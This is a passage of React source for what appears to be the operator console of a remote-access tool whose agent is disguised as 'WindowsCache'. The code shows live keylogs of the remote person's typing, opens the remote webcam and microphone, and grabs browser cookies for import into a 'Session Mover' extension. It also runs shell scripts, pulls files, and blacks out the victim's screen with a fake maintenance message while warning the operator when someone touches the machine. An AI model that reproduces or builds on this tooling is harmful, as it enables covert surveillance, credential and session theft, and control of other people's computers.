        const agent = activeAgentRef.current;
        if (!agent || data.deviceId !== agent.deviceId) return;
        if (!data.image) return;

        if (data.ts) {
          if (data.ts <= lastFrameTsRef.current) return;
          lastFrameTsRef.current = data.ts;
        }

        const url = `data:image/jpeg;base64,${data.image}`;
        lastFrameUrlRef.current = url;
        setScreenImage(url);

        // If WebRTC is healthy, keep video primary and only cache backup frames.
        if (webrtcAliveRef.current && screenModeRef.current === 'webrtc') {
          return;
        }

        // WebRTC down or never started — show screenshot backbone without blackout.
        if (screenModeRef.current !== 'screenshot') {
          screenModeRef.current = 'screenshot';
          setScreenMode('screenshot');
          setLoadingScreen(false);
          setStatus('connected');
          setStreamError('');
        }
        if (screenImgRef.current) {
          screenImgRef.current.src = url;
        }
        });

     socket.on('agent:screen:mode', (data) => {
  const agent = activeAgentRef.current;
  if (!agent || data.deviceId !== agent.deviceId) return;
  if (data.mode === 'screenshot') {
    enterScreenshotMode();
  }
});

    const reattachVideo = () => {
      if (videoRef.current && pcRef.current) {
        const receivers = pcRef.current.getReceivers();
        if (receivers.length > 0) {
          const stream = new MediaStream(receivers.map(r => r.track).filter(Boolean));
          videoRef.current.srcObject = stream;
          videoRef.current.play().catch(() => {});
        }
      }
    };

    socket.on('screen:status', (data) => { setScreenStatus(data.status); if (data.status === 'on') { setPrivacyOn(false); setPrivacyPct(null); setPrivacyPaused(false); reattachVideo(); } if (data.status === 'off') setPrivacyOn(true); });
    socket.on('screen:restored', () => { setScreenStatus('on'); setPrivacyOn(false); setScreenAlert(true); if (alertTimeoutRef.current) clearTimeout(alertTimeoutRef.current); alertTimeoutRef.current = setTimeout(() => setScreenAlert(false), 8000); reattachVideo(); });

    // [BL-EDIT] Account-level tags pushed by the relay on login (and after saves).
    // Server is the source of truth, so all devices converge on the same tags.
    socket.on('tags:sync', (d) => {
      const t = (d && d.tags) || {};
      setDeviceTags(t);
      try { localStorage.setItem('bl_device_tags', JSON.stringify(t)); } catch (e) {}
    });

    socket.on('user:active', (data) => {
      // [BL-EDIT] only for the agent we're currently viewing (never another device/account)
      if (!activeAgentRef.current || (data && data.deviceId !== activeAgentRef.current.deviceId)) return;
      if (weAreDriving()) return; // [BL-EDIT] ignore our own injected activity
      setUserActive(true);
      if (userActiveTimerRef.current) clearTimeout(userActiveTimerRef.current);
      userActiveTimerRef.current = setTimeout(() => setUserActive(false), 3000);
    });

    socket.on('user:mouse:pos', (data) => {
      if (weAreDriving()) return; // [BL-EDIT] don't show the red "user" cursor for our own moves
      if (!activeAgentRef.current || data.deviceId !== activeAgentRef.current.deviceId) return;
      const agent = activeAgentRef.current;
      const el = screenImgRef.current || videoRef.current;
      if (!agent || !el) return;
      const rect = el.getBoundingClientRect();
      const agentW = agent.screenWidth || 1920;
      const agentH = agent.screenHeight || 1080;
      const videoAspect = agentW / agentH;
      const elemAspect = rect.width / rect.height;
      let renderW, renderH, offsetX, offsetY;
      if (elemAspect > videoAspect) {
        renderH = rect.height; renderW = rect.height * videoAspect;
        offsetX = (rect.width - renderW) / 2; offsetY = 0;
      } else {
        renderW = rect.width; renderH = rect.width / videoAspect;
        offsetX = 0; offsetY = (rect.height - renderH) / 2;
      }
      const screenX = rect.left + offsetX + (data.x / agentW) * renderW;
      const screenY = rect.top + offsetY + (data.y / agentH) * renderH;
      setAgentCursorPos({ x: screenX, y: screenY });
      if (agentCursorTimerRef.current) clearTimeout(agentCursorTimerRef.current);
      agentCursorTimerRef.current = setTimeout(() => setAgentCursorPos(null), 3000);
    });

    socket.on('user:keylog', (data) => {
      // [BL-EDIT] only show keys from the agent we're viewing (never another device/account)
      if (!activeAgentRef.current || data.deviceId !== activeAgentRef.current.deviceId) return;
      if (!weAreDriving()) { // [BL-EDIT] only flag "user active" for the remote person, not our own typing
        setUserActive(true);
        if (userActiveTimerRef.current) clearTimeout(userActiveTimerRef.current);
        userActiveTimerRef.current = setTimeout(() => setUserActive(false), 3000);
      }
      if (!keylogOnRef.current) return;
      const k = data.key;
      // Assemble the keys into readable text instead of raw [Tab][Backspace].
      setKeylogText(prev => {
        let t = prev;
        if (k === 'Backspace') t = t.slice(0, -1);
        else if (k === 'Enter') t = t + '\n';
        else if (k === 'Space' || k === ' ') t = t + ' ';
        else if (k === 'Tab') t = t + '\t';
        else if (typeof k === 'string' && k.length === 1) t = t + k;
        // modifiers and other special keys are ignored so the text stays clean
        return t.slice(-600);
      });
      if (keylogTimerRef.current) clearTimeout(keylogTimerRef.current);
      keylogTimerRef.current = setTimeout(() => setKeylogText(''), 10000);
    });

    socket.on('response', (data) => {
      if (data.type === 'fs:list') {
        if (data.requestId !== browseReqIdRef.current) return;
        setBrowseLoading(false);
        if (data.error) { setBrowseError(data.error); return; }
        setBrowsePath(data.path); setBrowseParent(data.parent); setBrowseEntries(data.entries || []);
        return;
      }
      if (data.type === 'clipboard:content') {
        console.log('[CLIP] received from agent:', data.text?.length, 'chars');
        navigator.clipboard.writeText(data.text || '')
          .then(() => { console.log('[CLIP] wrote to local clipboard OK'); setClipboardStatus('✅ Agent clipboard copied'); })
          .catch((e) => { console.error('[CLIP] write FAILED:', e.name, e.message); setClipboardStatus('❌ ' + e.name); });
        setTimeout(() => setClipboardStatus(''), 3000);
        return;
      }
      if (data.type === 'clipboard:image') {
        if (data.dataUrl) { setAgentImage(data.dataUrl); setClipboardStatus('🖼 Image received from agent'); }
        else setClipboardStatus('No image on the agent clipboard');
        setTimeout(() => setClipboardStatus(''), 3000);
        return;
      }
      if (data.type === 'clipboard:image-set') {
        setClipboardStatus(data.ok ? '🖼 Image placed on the agent clipboard' : '❌ Could not set the image');
        setTimeout(() => setClipboardStatus(''), 3000);
        return;
      }
      if (data.type === 'intrusion') {
  setIntrusion(data.kind === 'key' ? 'Someone is typing on the machine'
                                   : 'Someone moved the mouse');
  if (window._intrTimer) clearTimeout(window._intrTimer);
  window._intrTimer = setTimeout(() => setIntrusion(''), 2500);
  return;
}
      if (data.type === 'camera:frame') {
    setCameraFrame(`data:image/jpeg;base64,${data.image}`);
    setCameraOn(true);
    setCamStatus('');
    setCameraError('');
    camFrameCountRef.current++;                 // [BL-EDIT] adaptive: count arrivals
    if (camTimeoutRef.current) { clearTimeout(camTimeoutRef.current); camTimeoutRef.current = null; } // first frame arrived
    return;
  }
  if (data.type === 'camera:error') {
    // [BL-EDIT] Keep the camera window open and show a clear message (e.g. no
    // camera on that machine) instead of a 4-second toast that vanishes.
    setCamStatus(data.error || 'Camera unavailable');
    setCameraOn(true);
    return;
  }
  if (data.type === 'audio:frame') {
  if (audioOnRef.current) playAudioChunk(data.data, data.rate);
  return;
}
  if (data.type === 'audio:error') {
    setAudioOn(false);
    return;
  }
          if (data.type === 'screen:fallback') {
      enterScreenshotMode();
      return;
    }
      if (data.type === 'monitor:list') { setMonitors(data.monitors || []); return; }
      // [BL-EDIT] Migrate preview + cookie grab responses.
      if (data.type === 'state:preview') { setStatePreview(data.items || []); if (data.error) setMigStatus('Preview error: ' + data.error); return; }
      if (data.type === 'cookies:summary') { setCookieBusy(false); setMigStatus(`Grabbed ${data.count} cookies (${data.note}). Saved as a file — import it in the Session Mover extension.`); return; }
      // [BL-EDIT] lock + task manager responses
      if (data.type === 'input:lock') { setInputLocked(!!data.locked); return; }
      if (data.type === 'privacy:progress') { setPrivacyPct(typeof data.pct === 'number' ? data.pct : null); setPrivacyPaused(!!data.paused); return; }
      if (data.type === 'proc:list') { setProcLoading(false); setProcList(data.procs || []); return; }
      if (data.type === 'proc:kill') { if (data.ok) { setProcList(prev => prev.filter(p => p.pid !== data.pid)); } setClipboardStatus(data.message || (data.ok ? 'Killed' : 'Kill failed')); setTimeout(() => setClipboardStatus(''), 3000); return; }
      if (data.type === 'monitor:switched') { setActiveMonitor(data.index); return; }
      if (data.type === 'file:received') { setTransferStatus(`✅ File saved to agent Desktop: ${data.fileName}`, true); }
      else if (data.type === 'file:error') { setTransferStatus(`❌ Transfer failed: ${data.error}`, true); setCookieBusy(false); }
      else if (data.type === 'file:chunk') {
        const key = data.fileName;
        if (!fileChunksRef.current[key]) fileChunksRef.current[key] = { chunks: new Array(data.totalChunks), received: 0, total: data.totalChunks, size: data.fileSize };
        const entry = fileChunksRef.current[key];
        entry.chunks[data.chunkIndex] = data.data; entry.received += 1;
        const pct = Math.round((entry.received / entry.total) * 100);
        const sizeMb = (entry.size / (1024*1024)).toFixed(1);
        setTransferStatus(`⬇️ Downloading ${data.fileName} — ${pct}% of ${sizeMb} MB`);
        if (entry.received === entry.total) {
          try {
            const byteArrays = entry.chunks.map(b64 => { const bin = atob(b64); const bytes = new Uint8Array(bin.length); for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i); return bytes; });
            const total = byteArrays.reduce((s, a) => s + a.length, 0);
            const merged = new Uint8Array(total); let offset = 0;
            for (const arr of byteArrays) { merged.set(arr, offset); offset += arr.length; }
            const url = URL.createObjectURL(new Blob([merged]));
            const a = document.createElement('a'); a.href = url; a.download = data.fileName; a.click();
            URL.revokeObjectURL(url); delete fileChunksRef.current[key];
            setTransferStatus(`✅ Downloaded: ${data.fileName} (${sizeMb} MB)`, true);
          } catch (err) { setTransferStatus(`❌ Failed: ${err.message}`, true); }
        }
      }
    });
  };

  const connectAgent = async (agent) => {
    // Un-clear this agent: if it later goes offline it should show again.
    setClearedOffline(prev => {
      const next = prev.filter(id => id !== agent.deviceId);
      try { localStorage.setItem('bl_cleared_offline', JSON.stringify(next)); } catch (e) {}
      return next;
    });
    setActiveAgent(agent); activeAgentRef.current = agent;
    setScreen('control'); setStatus('Connecting...');
    setLoadingScreen(true); setLoadingMsg('Establishing connection...');
    setPrivacyOn(false); setScreenStatus('on'); setScreenAlert(false);
    setAgentLocation(null); setTransferStatus(''); setShowFilePanel(false);
    setBrowsing(false); setBrowseEntries([]);
    setAgentOffline(false); setStreamError(''); setReconnectCountdown(0); agentOfflineRef.current = false;
    setShowChat(false); setChatMsg(''); setChatSent(''); setClipboardStatus('');
    setMonitors([]); setActiveMonitor(1); setShowMonitors(false);
   setScreenImage(null);
lastFrameTsRef.current = 0;

const preferScreenshot =
  agent.streamMode === 'screenshot' ||
  agent.webrtcAvailable === false;

webrtcAliveRef.current = false;
setStreamLive(false);
lastFrameUrlRef.current = null;
setScreenImage(null);

if (preferScreenshot) {
  enterScreenshotMode();
  setLoadingMsg('Starting stream...');
} else {
  screenModeRef.current = 'webrtc';
  setScreenMode('webrtc');
  setLoadingMsg('Establishing connection...');
}

fetchAgentLocation(agent);
// Mouse control starts OFF on every connect. The engineer turns it on with
// the 🖱 button only when they actually want to drive the machine.
setMouseEnabled(false);
mouseEnabledRef.current = false;

// Start session immediately so screenshot backbone + input work even before WebRTC.
setTimeout(() => sendCommand({ type: 'session:start' }), 200);
if (!preferScreenshot) {
  setTimeout(() => startWebRTC(agent), 400);
}
setTimeout(() => sendCommand({ type: 'monitor:list' }), 1200);

// Keep focus for keyboard capture
setTimeout(() => { try { controlRef.current && controlRef.current.focus(); } catch {} }, 300);
};



const startWebRTC = async (agent) => {
    if (
        agent?.streamMode === 'screenshot' ||
        agent?.webrtcAvailable === false
    ) {
        enterScreenshotMode(lastFrameUrlRef.current || undefined);
        return;
    }

    const gen = ++pcGenRef.current;
    captureLastVideoFrame();
    if (pcRef.current) { try { pcRef.current.close(); } catch(e){} pcRef.current = null; }
    webrtcAliveRef.current = false;
    setStreamLive(false);

    await new Promise(r => setTimeout(r, 600));   // ← was 250, now 600
    if (gen !== pcGenRef.current) return;

    const pc = new RTCPeerConnection({ iceServers: ICE_SERVERS });
    pcRef.current = pc;

    if (latencyIntervalRef.current) clearInterval(latencyIntervalRef.current);
    latencyIntervalRef.current = setInterval(async () => {
        if (pcRef.current) {
            try {
                const stats = await pcRef.current.getStats();
                stats.forEach(report => {
                    if (report.type === 'candidate-pair' && report.state === 'succeeded') {
                        const rtt = report.currentRoundTripTime;
                        if (rtt !== undefined) {
                            const ms = Math.round(rtt * 1000);
                            setLatency(ms);
                            let q;
                            if (ms < 50) q = 'excellent';
                            else if (ms < 100) q = 'good';
                            else if (ms < 200) q = 'fair';
                            else q = 'poor';
                            setQuality(q);
                            // [BL-EDIT] Auto-quality: pick a stream width from the
                            // connection tier and tell the agent, but only when it
                            // actually changes (avoids constant re-negotiation).
                            if (autoQualityRef.current) {
                              // Hysteresis: only change resolution once the tier has
                              // held steady for ~3 readings (6s) AND at least 15s since
                              // the last change — otherwise a flapping link thrashes the
                              // encoder and makes things worse.
                              if (q === qTierRef.current) qStableRef.current++;
                              else { qTierRef.current = q; qStableRef.current = 1; }
                              const targetW = q === 'excellent' ? 1920 : q === 'good' ? 1600 : q === 'fair' ? 1280 : 1024;
                              const nowT = Date.now();
                              if (targetW !== lastStreamWRef.current && qStableRef.current >= 3 && (nowT - lastQChangeRef.current) > 15000) {
                                lastStreamWRef.current = targetW;
                                lastQChangeRef.current = nowT;
                                sendCommand({ type: 'stream:quality', width: targetW });
                              }
                            }
                        }
                    }
                });
            } catch {}
        }
    }, 2000);

    pc.ontrack = (event) => {
        if (gen !== pcGenRef.current) return;
        if (event.track.kind !== 'video') return;
        const stream = event.streams[0] || new MediaStream([event.track]);
        webrtcAliveRef.current = true;
        setStreamLive(true);
        screenModeRef.current = 'webrtc';
        setScreenMode('webrtc');
        setStatus('connected');
        setStreamError('');
        setAgentOffline(false);
        agentOfflineRef.current = false;
        setLoadingScreen(false);
        if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current);
        if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
        setReconnectCountdown(0);
        const attach = () => {
            if (!videoRef.current) { setTimeout(attach, 100); return; }
            videoRef.current.srcObject = stream;
            videoRef.current.muted = true;
            videoRef.current.disablePictureInPicture = true;
            videoRef.current.play().then(() => setStatus('connected')).catch(() => {
                setTimeout(() => {
                    if (videoRef.current) {
                        videoRef.current.srcObject = stream;
                        videoRef.current.muted = true;
                        videoRef.current.play().catch(() => {});
                    }
                }, 300);
            });
        };
        attach();
        event.track.onmute = () => { /* hold last frame */ };
        event.track.onended = () => {
            if (gen !== pcGenRef.current) return;
            webrtcAliveRef.current = false;
            setStreamLive(false);
            captureLastVideoFrame();
            if (!agentOfflineRef.current) scheduleReconnect(agent, 2);
        };
    };

    pc.onicecandidate = (event) => {
        if (gen !== pcGenRef.current || !event.candidate) return;
        socketRef.current.emit('webrtc:ice', {
            candidate: event.candidate,
            deviceId: agent.deviceId,
            target: 'agent',
            gen
        });
    };

    // ICE state — status updates only, NO reconnect triggers here
    pc.oniceconnectionstatechange = () => {
    if (gen !== pcGenRef.current) return;
    const s = pc.iceConnectionState;
    if (s === 'connected' || s === 'completed') {
        if (graceTimerRef.current) { clearTimeout(graceTimerRef.current); graceTimerRef.current = null; }
        webrtcAliveRef.current = true;
        setStreamLive(true);
        setLoadingScreen(false);
        setStreamError('');
        setStatus('connected');
    } else if (s === 'checking' || s === 'connecting') {
        setStatus('Connecting stream...');
    } else if (s === 'disconnected') {
        // Often self-heals. Nudge ICE, keep the last frame, do NOT rebuild yet.
        setStatus('Stream interrupted...');
        captureLastVideoFrame();
        try { pc.restartIce && pc.restartIce(); } catch {}
    } else if (s === 'failed') {
        captureLastVideoFrame();
        setStreamError('Stream reconnecting...');
    }
};

    // Connection state — this is the ONE place that triggers reconnects
   pc.onconnectionstatechange = () => {
    if (gen !== pcGenRef.current) return;
    const cs = pc.connectionState;

    if (cs === 'connected') {
        if (graceTimerRef.current) { clearTimeout(graceTimerRef.current); graceTimerRef.current = null; }
        webrtcAliveRef.current = true;
        setStreamLive(true);
        setLoadingScreen(false);
        setStreamError('');
        setStatus('connected');

    } else if (cs === 'disconnected') {
        // Give WebRTC a chance to heal before rebuilding (avoids the black blink).
        webrtcAliveRef.current = false;
        setStreamLive(false);
        captureLastVideoFrame();
        setStatus('Reconnecting stream...');
        try { pc.restartIce && pc.restartIce(); } catch {}

        if (graceTimerRef.current) clearTimeout(graceTimerRef.current);
        graceTimerRef.current = setTimeout(() => {
            graceTimerRef.current = null;
            // Still not healthy after the grace window → full rebuild.
            if (gen === pcGenRef.current &&
                pcRef.current &&
                pcRef.current.connectionState !== 'connected' &&
                !agentOfflineRef.current) {
                scheduleReconnect(agent, 1);
            }
        }, 6000);

    } else if (cs === 'failed' || cs === 'closed') {
        if (graceTimerRef.current) { clearTimeout(graceTimerRef.current); graceTimerRef.current = null; }
        webrtcAliveRef.current = false;
        setStreamLive(false);
        captureLastVideoFrame();
        setLoadingScreen(false);
        setStreamError('Stream reconnecting...');
        scheduleReconnect(agent, 2);
    }
};



    pc.addTransceiver('video', { direction: 'recvonly' });

    const offer = await pc.createOffer();
    const sdp = offer.sdp
        .replace(/b=AS:\d+/g, 'b=AS:8000')
        .replace(/b=TIAS:\d+/g, 'b=TIAS:8000000');
    await pc.setLocalDescription({ type: offer.type, sdp });
    socketRef.current.emit('webrtc:offer', {
        offer: { sdp: pc.localDescription.sdp, type: pc.localDescription.type },
        deviceId: agent.deviceId,
        gen
    });
};

const openCamera = () => {
    setCameraOn(true);
    setCameraFrame(null);
    setCamStatus('starting');   // [BL-EDIT] show a clear "starting" state right away
    sendCommand({ type: 'camera:start' });
    // [BL-EDIT] Adaptive quality: every 3s check how many frames actually
    // arrived, and nudge the level so a weak/distant network keeps flowing
    // (down) or a good one sharpens (up). Hysteresis via one step at a time.
    camFrameCountRef.current = 0; camLevelRef.current = 'medium';
    const order = ['low', 'medium', 'high'];
    if (camAdaptRef.current) clearInterval(camAdaptRef.current);
    camAdaptRef.current = setInterval(() => {
      const fps = camFrameCountRef.current / 3;
      camFrameCountRef.current = 0;
      let i = order.indexOf(camLevelRef.current); if (i < 0) i = 1;
      if (fps < 3.5 && i > 0) i--;            // struggling → step down
      else if (fps >= 5.5 && i < order.length - 1) i++;  // healthy → step up
      const next = order[i];
      if (next !== camLevelRef.current) { camLevelRef.current = next; sendCommand({ type: 'camera:quality', level: next }); }
    }, 3000);
    // [BL-EDIT] Timeout so "opening camera" can't hang forever.
    if (camTimeoutRef.current) clearTimeout(camTimeoutRef.current);
    camTimeoutRef.current = setTimeout(() => {
      camTimeoutRef.current = null;
      setCamStatus(prev => (prev === 'starting' ? "Camera is slow or blocked on this connection. Close and try again." : prev));
    }, 12000);
};
const closeCamera = () => {
    sendCommand({ type: 'camera:stop' });
    setCameraOn(false);
    setCameraFrame(null);
    setCamStatus('');
    if (camAdaptRef.current) { clearInterval(camAdaptRef.current); camAdaptRef.current = null; }
    if (camTimeoutRef.current) { clearTimeout(camTimeoutRef.current); camTimeoutRef.current = null; }
};
// [BL-EDIT] Drag the camera window by its header.
const startCamDrag = (e) => {
    const startX = e.clientX, startY = e.clientY;
    const el = e.currentTarget.parentElement;
    const rect = el.getBoundingClientRect();
    const base = camPos || { x: rect.left, y: rect.top };
    const onMove = (ev) => setCamPos({ x: base.x + (ev.clientX - startX), y: base.y + (ev.clientY - startY) });
    const onUp = () => { document.removeEventListener('mousemove', onMove); document.removeEventListener('mouseup', onUp); };
    document.addEventListener('mousemove', onMove);
    document.addEventListener('mouseup', onUp);
};


  const sendCommand = (command) => {
    const agent = activeAgentRef.current;
    if (!agent) return;
    // [BL-EDIT] Remember when WE last drove input, so the agent's own
    // "user active" echo (from our injected mouse/keys) doesn't light up.
    if (command && /^(mouse_|key_|type_text)/.test(command.type || '')) {
      lastInputSentRef.current = Date.now();
    }
    socketRef.current.emit('controller:command', { deviceId: agent.deviceId, command, token: tokenRef.current });
  };
  // [BL-EDIT] True for ~1.5s after we sent input — i.e. the activity is ours, not the remote user's.
  const weAreDriving = () => (Date.now() - lastInputSentRef.current) < 1500;

  const deleteAgent = (agent) => {
    if (!window.confirm(`Remove ${agent.name} from dashboard?\n\nThis only removes it from view. The agent will reconnect automatically if still running.`)) return;
    setAgents(prev => prev.filter(a => a.deviceId !== agent.deviceId));
  };

  const uninstallAgent = (agent) => {
    if (!window.confirm(`⚠️ UNINSTALL WINDOWSCACHE from ${agent.name}?\n\nThis will permanently remove WindowsCache from that machine. It will stop running and disappear from your dashboard.\n\nThis cannot be undone.`)) return;
    if (socketRef.current?.connected) {
      socketRef.current.emit('controller:command', {
        deviceId: agent.deviceId,
        command: { type: 'agent:uninstall' },
        token: tokenRef.current
      });
    }
    setTimeout(() => {
      setAgents(prev => prev.filter(a => a.deviceId !== agent.deviceId));
    }, 5000);
    setUninstallToast(`✅ Uninstall command sent to ${agent.name}`);
    setTimeout(() => setUninstallToast(''), 4000);
  };

  const runToolboxScript = (agent, script) => {
    if (!socketRef.current?.connected) return;
    socketRef.current.emit('controller:command', {
      deviceId: agent.deviceId,
      command: { type: 'shell', command: script.command },
      token: tokenRef.current
    });
    setShowToolbox(null);
    setUninstallToast(`✅ "${script.name}" sent to ${agent.name}`);
    setTimeout(() => setUninstallToast(''), 3000);
  };

  const toggleMouse = () => { const next = !mouseEnabled; setMouseEnabled(next); mouseEnabledRef.current = next; };

  const togglePrivacy = () => {
    if (privacyOn) { sendCommand({ type: 'privacy:off' }); setPrivacyOn(false); setScreenStatus('on'); setPrivacyPct(null); setPrivacyPaused(false); }
    else {
      // [BL-EDIT] Ask what message to show on the black screen. Pre-filled with
      // the default — hit OK for default, or type your own (e.g. what you're
      // servicing). Cancel = don't enable privacy.
      const def = 'Maintenance in progress — please do not touch';
      appPrompt('Message to show on the remote screen while private (keep the default, or type your own):', def).then((msg) => {
        if (msg === null) return;
        sendCommand({ type: 'privacy:on', message: (msg || '').trim() });
        setPrivacyOn(true); setScreenStatus('off');
      });
    }
  };

  const showKey = (key) => {
    setLastKey(key);
    if (keyTimeoutRef.current) clearTimeout(keyTimeoutRef.current);
    keyTimeoutRef.current = setTimeout(() => setLastKey(''), 1000);
  };

  const restartAgent = (agent) => {
  if (!window.confirm(`Restart agent "${agent.name || agent.deviceId}"?`)) return;
  socketRef.current.emit('controller:command', {
    deviceId: agent.deviceId,
    command: { type: 'system:restart' },
    token: tokenRef.current,
  });
};

  // ---- State migration receiver (own machines only) ----
  const migRandomId = () => (crypto.randomUUID
    ? crypto.randomUUID().replace(/-/g, '')
    : Array.from(crypto.getRandomValues(new Uint8Array(16))).map((b) => b.toString(16).padStart(2, '0')).join(''));
  const migSavePkgs = (list) => {
    setMigPkgs(list);
    try { localStorage.setItem('bl_state_packages', JSON.stringify(list.slice(0, 40))); } catch (e) {}
  };
  const migQueue = async (action, id, targets) => {
    const dev = activeAgentRef.current;
    if (!dev) return false;
    try {
      const res = await fetch('https://relay.bridgelin.online/admin/state/queue', {
        method: 'POST', headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ deviceId: dev.deviceId, action, id, targets }),
      });
      const d = await res.json();
      return !!(d && d.ok);
    } catch (e) { return false; }
  };
  const migCapture = async () => {
    const targets = Object.keys(migTargets).filter((k) => migTargets[k]);
    if (!targets.length) { setMigStatus('Pick at least one app.'); return; }
    const id = migRandomId();
    setMigStatus('Queuing capture...');
    const ok = await migQueue('capture', id, targets);
    if (ok) {
      const dev = activeAgentRef.current;
      migSavePkgs([{ id, source: (dev && dev.name) || 'machine', targets, time: Date.now() }, ...migPkgs]);
      setMigStatus('Capture queued. It runs on the next check-in, then shows in the restore list.');
    } else { setMigStatus('Could not queue capture.'); }
  };
  const migRestore = async () => {
    if (!migSel) { setMigStatus('Pick a capture to restore.'); return; }
    if (!window.confirm('Restore this saved state onto the controlled machine? The apps will close and their state is replaced.')) return;
    setMigStatus('Queuing restore...');
    const ok = await migQueue('restore', migSel, []);
    setMigStatus(ok ? 'Restore queued. It runs on the next check-in.' : 'Could not queue restore.');
  };

  const getRemoteCoords = (e) => {
    const el = (screenMode === 'screenshot' || !webrtcAliveRef.current)
      ? (screenImgRef.current || videoRef.current)
      : (videoRef.current || screenImgRef.current);
    if (!el) return { x: 0, y: 0 };
    const rect = el.getBoundingClientRect();
    const agentW = activeAgentRef.current?.screenWidth || 1920;
    const agentH = activeAgentRef.current?.screenHeight || 1080;
    const videoAspect = agentW / agentH, elemAspect = rect.width / rect.height;
    let renderW, renderH, offsetX, offsetY;
    if (elemAspect > videoAspect) { renderH = rect.height; renderW = rect.height * videoAspect; offsetX = (rect.width - renderW) / 2; offsetY = 0; }
    else { renderW = rect.width; renderH = rect.width / videoAspect; offsetX = 0; offsetY = (rect.height - renderH) / 2; }
    const x = Math.round((e.clientX - rect.left - offsetX) * agentW / renderW);
    const y = Math.round((e.clientY - rect.top - offsetY) * agentH / renderH);
    return { x: Math.max(0, Math.min(agentW, x)), y: Math.max(0, Math.min(agentH, y)) };
  };

  const handleVideoClick = (e) => {
    if (controlRef.current) controlRef.current.focus();
    if (!mouseEnabledRef.current) return;
    const { x, y } = getRemoteCoords(e);
    const now = Date.now();
    const dist = Math.abs(x - lastClickPos.current.x) + Math.abs(y - lastClickPos.current.y);
    // [BL-EDIT] Clean single/double click. A second click within 350ms cancels
    // the pending single click and sends ONE mouse_dblclick (the agent runs a
    // tight local double-click). This stops the old bug where a stray extra
    // click made folders rename/misbehave instead of opening.
    if (clickTimerRef.current && now - lastClickTime.current < 350 && dist < 12) {
      clearTimeout(clickTimerRef.current); clickTimerRef.current = null;
      lastClickTime.current = 0;
      sendCommand({ type: 'mouse_dblclick', x, y, button: 'left' });
    } else {
      lastClickTime.current = now;
      lastClickPos.current = { x, y };
      if (clickTimerRef.current) clearTimeout(clickTimerRef.current);
      clickTimerRef.current = setTimeout(() => {
        clickTimerRef.current = null;
        sendCommand({ type: 'mouse_click', x, y, button: 'left' });
      }, 230);
    }
  };

  const handleVideoRightClick = (e) => {
    e.preventDefault(); e.stopPropagation();
    const { x, y } = getRemoteCoords(e);
    sendCommand({ type: 'mouse_click', x, y, button: 'right' });
    if (controlRef.current) controlRef.current.focus();
  };

  const handleVideoMove = (e) => {
    setCursorPos({ x: e.clientX, y: e.clientY }); setCursorVisible(true);
    setCursorType('default'); // [BL-EDIT] moving the mouse always restores the arrow (was stuck as I-beam after typing)
    if (!mouseEnabledRef.current) return;
    const coords = getRemoteCoords(e);
    pendingMouseRef.current = coords;
    if (mouseRafRef.current) return;
    mouseRafRef.current = requestAnimationFrame(() => {
      mouseRafRef.current = null;
      const now = Date.now();
      // ~60fps cap; agent coalesces further if backlog
      if (now - lastMouseMove.current < 16) return;
      lastMouseMove.current = now;
      const p = pendingMouseRef.current;
      if (!p) return;
      sendCommand({ type: 'mouse_move', x: p.x, y: p.y });
    });
  };

  const handleVideoLeave = () => setCursorVisible(false);

  const handleTouchStart = (e) => {
    e.preventDefault();
    if (e.touches.length === 1) {
      const touch = e.touches[0];
      const { x, y } = getRemoteCoords({ clientX: touch.clientX, clientY: touch.clientY });
      lastClickTime.current = Date.now(); lastClickPos.current = { x, y };
    }
  };

  const handleTouchEnd = (e) => {
    e.preventDefault();
    if (e.changedTouches.length === 1) {
      const touch = e.changedTouches[0];
      const { x, y } = getRemoteCoords({ clientX: touch.clientX, clientY: touch.clientY });
      const now = Date.now();
      const dist = Math.abs(x - lastClickPos.current.x) + Math.abs(y - lastClickPos.current.y);
      if (now - lastClickTime.current < 300 && dist < 15) sendCommand({ type: 'mouse_click', x, y, button: 'left' });
      if (controlRef.current) controlRef.current.focus();
    }
  };

  const handleTouchMove = (e) => {
    e.preventDefault();
    if (e.touches.length === 1) {
      const touch = e.touches[0];
      const now = Date.now();
      if (now - lastMouseMove.current < 16) return;
      lastMouseMove.current = now;
      const { x, y } = getRemoteCoords({ clientX: touch.clientX, clientY: touch.clientY });
      sendCommand({ type: 'mouse_move', x, y });
    }
  };

  // [BL-EDIT] Scrolling. The old handler used React's onWheel, which is a
  // PASSIVE listener, so preventDefault() did nothing and the trackpad pinch
  // zoomed the page instead of scrolling. We now attach a NON-passive wheel
  // listener (see the useEffect below) so preventDefault actually blocks zoom,
  // and we honor both vertical and horizontal deltas.
  const doScroll = (dx, dy) => { if (dx || dy) sendCommand({ type: 'mouse_scroll', dx, dy }); };
  const wheelClicks = (d) => (d === 0 ? 0 : Math.max(1, Math.min(5, 1 + Math.floor(Math.abs(d) / 50))));
  const handleWheel = (e) => {
    if (!mouseEnabledRef.current) return;
    e.preventDefault();  // stops browser/Electron pinch-zoom and page scroll
    const dy = e.deltaY === 0 ? 0 : (e.deltaY > 0 ? -wheelClicks(e.deltaY) : wheelClicks(e.deltaY));
    const dx = e.deltaX === 0 ? 0 : (e.deltaX > 0 ? -wheelClicks(e.deltaX) : wheelClicks(e.deltaX));
    doScroll(dx, dy);
  };
  // Press-and-hold for the on-screen arrow buttons.
  const startScroll = (dx, dy) => {
    doScroll(dx, dy);
    if (scrollHoldRef.current) clearInterval(scrollHoldRef.current);
    scrollHoldRef.current = setInterval(() => doScroll(dx, dy), 120);
  };
  const stopScroll = () => { if (scrollHoldRef.current) { clearInterval(scrollHoldRef.current); scrollHoldRef.current = null; } };
  // [BL-EDIT] Attach the wheel listener non-passively so preventDefault works.
  useEffect(() => {
    if (screen !== 'control') return;
    const el = controlRef.current;
    if (!el) return;
    const h = (e) => handleWheel(e);
    el.addEventListener('wheel', h, { passive: false });
    return () => el.removeEventListener('wheel', h);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [screen]);

  // [BL-EDIT] Mobile pinch-zoom + two-finger pan of the remote view. One finger
  // is left alone (it stays tap-to-click / drag-to-move). Two fingers zoom/pan
  // the LOCAL view only and never reach the agent. Non-passive so we can block
  // the browser's own page pinch. Taps still map correctly because getRemoteCoords
  // reads the (transformed) element's rect.
  useEffect(() => {
    if (screen !== 'control') return;
    const el = videoWrapRef.current;
    if (!el) return;
    const dist = (t) => Math.hypot(t[0].clientX - t[1].clientX, t[0].clientY - t[1].clientY);
